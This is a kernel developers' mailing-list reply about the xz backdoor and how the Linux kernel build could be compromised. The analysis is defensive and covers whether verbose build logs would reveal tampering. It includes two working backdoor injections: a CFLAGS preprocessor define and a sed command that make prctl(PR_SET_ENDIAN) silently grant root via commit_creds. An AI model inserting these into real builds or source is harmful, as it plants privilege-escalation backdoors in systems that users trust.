Re: xz meltdown/Lasse Collin

[Michael Ellerman <mpe@ellerman.id.au>]

Vegard Nossum <vegard.nossum@oracle.com> writes:
> On 13/04/2024 15:16, James Bottomley wrote:
>>     2. We need better build artifact transparency generally but  I think
>>        the kernel is fine here: we still use make so don't have the huge
>>        build artifact issue that allowed the exploit in and we have a
>>        documented signing process for our build artifacts (kernel
>>        tarballs).
>>     3. The indirect library dependency problem doesn't apply to us.
>
> While this is technically true, there are many other ways to compromise
> the kernel build process:
>
> 1) you can pass code in through the CFLAGS environment variable, one
> example that I came up with together with Michael Ellerman would be:
>
>    -DSET_ENDIAN(x,y)=-22,commit_creds((void*)init_task.cred)
>
> when building kernel/sys.c on x86, this is will turn any userspace call
> of prctl(PR_SET_ENDIAN), which normally just returns -EINVAL, into a
> backdoor quietly making the calling process root.
>
> All you need for an injection site is a preprocessor define that is
> conditionally set with #ifndef FOO/#define FOO.
>
> This does not appear in any source file or build output directly and so
> likely wouldn't get caught by SBOM-type solutions.

It would appear in the build log of a V=1 build. Someone would still
need to spot it, but at least there'd be a chance.

Debian kernels seem to use KBUILD_VERBOSE=1 by default. Judging from the
log (249MB!):
  https://buildd.debian.org/status/fetch.php?pkg=linux&arch=amd64&ver=6.7.9-2&stamp=1710355583&raw=1

  # CC      kernel/sys.o
     x86_64-linux-gnu-gcc-13 -Wp,-MMD,kernel/.sys.o.d -nostdinc -I/<<PKGBUILDDIR>>/arch/x86/include -I./arch/x86/include/generated -I/<<PKGBUILDDIR>>/include -I./include -I/<<PKGBUILDDIR>>/arch/x86/
  include/uapi -I./arch/x86/include/generated/uapi -I/<<PKGBUILDDIR>>/include/uapi -I./include/generated/uapi -include /<<PKGBUILDDIR>>/include/linux/compiler-version.h -include /<<PKGBUILDDIR>>/inc
  lude/linux/kconfig.h -include /<<PKGBUILDDIR>>/include/linux/compiler_types.h -D__KERNEL__ -fmacro-prefix-map=/<<PKGBUILDDIR>>/= -std=gnu11 -fshort-wchar -funsigned-char -fno-common -fno-PIE -fno-
  strict-aliasing -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=branch -fno-jump-tables -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundar
  y=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-p
  refix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fpatchable-function-entry=16,16 -fno-delete-null-pointer-checks -O2 -fno-allow-store-data-races -fstack-protector-strong -ft
  rivial-auto-var-init=zero -fno-stack-clash-protection -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -falign-functions=16 -fstrict-flex-arrays=3 -fno-strict-overflow -fno-stack-check -fconserve-st
  ack -Wall -Wundef -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Werror=strict-prototypes -Wno-format-security -Wno-trigraphs -Wno-frame-address -Wno-address-of-pa
  cked-member -Wframe-larger-than=2048 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -Wno-dangling-pointer -Wvla -Wno-pointer-sign -Wcast-function-type -Wno-array-bounds -Wno-all
  oc-size-larger-than -Wimplicit-fallthrough=5 -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wenum-conversion -Wno-unused-but-set-variable -Wno-unused-const-variable
  -Wno-restrict -Wno-packed-not-aligned -Wno-format-overflow -Wno-format-truncation -Wno-stringop-overflow -Wno-stringop-truncation -Wno-missing-field-initializers -Wno-type-limits -Wno-shift-negati
  ve-value -Wno-maybe-uninitialized -Wno-sign-compare -g -fdebug-prefix-map=/<<PKGBUILDDIR>>/= -I /<<PKGBUILDDIR>>/kernel -I ./kernel    -DKBUILD_MODFILE='"kernel/sys"' -DKBUILD_BASENAME='"sys"' -DK
  BUILD_MODNAME='"sys"' -D__KBUILD_MODNAME=kmod_sys -c -o kernel/sys.o /<<PKGBUILDDIR>>/kernel/sys.c


Though obviously that just motivates an attacker to inject their payload
via some other mechanism, eg. by modifying the source eariler in the
build:

 $ sed -i -e "s/SET_ENDIAN(me, arg2)/-22;commit_creds((void*)init_task.cred)/" kernel/sys.c

On the other hand it looks like Fedora kernels are not built with V=1.
Just looking at the log (search for '-j48 bzImage'):
  https://kojipkgs.fedoraproject.org//packages/kernel/6.8.5/301.fc40/data/logs/x86_64/build.log


cheers